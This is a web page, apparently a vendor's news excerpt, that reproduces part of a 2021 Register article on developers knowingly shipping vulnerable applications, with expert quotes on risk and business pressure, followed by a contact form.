Total Tests:

‘What are the odds someone will find and exploit this?’ Nice one — you just released an insecure app

By Davey Winder for The Register
Friday, June 25, 2021

Any developer under pressure to release new functionality may, Wright suggested, be under the false assumption that the worst that can happen for their customers is an annoying popup box. “In reality, this could lead to things such as an attacker being able to steal a victim’s session, being able to redirect victims to phishing pages, or even a user’s browser being controlled using tools such as Browser Exploitation Framework (BeEF).”

One of the dangers of taking that 81 per cent “knowingly” statistic at face value is that not all vulnerabilities are high risk or, indeed, exploitable in the production environment. This means, according to Ilia Kolochenko, founder of ImmuniWeb and a member of the Europol Data Protection Experts Network, that “releasing applications with vulnerabilities is not necessarily a highly dangerous practice”.

He explained how many automated security tools erroneously present various unexploitable warnings such as missing secure flags on cookies without any sensitive data and minor misconfigurations related to HTTP headers, for example, as high-risk vulnerabilities that developers readily ignore. “In many organisations, pressure from business is extreme, and developers are forced to go into production too early and fix vulnerable code in flight mode due to tough time constraints.” Read Full Article

Book a Call Ask a Question
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
Your data will stay private and confidential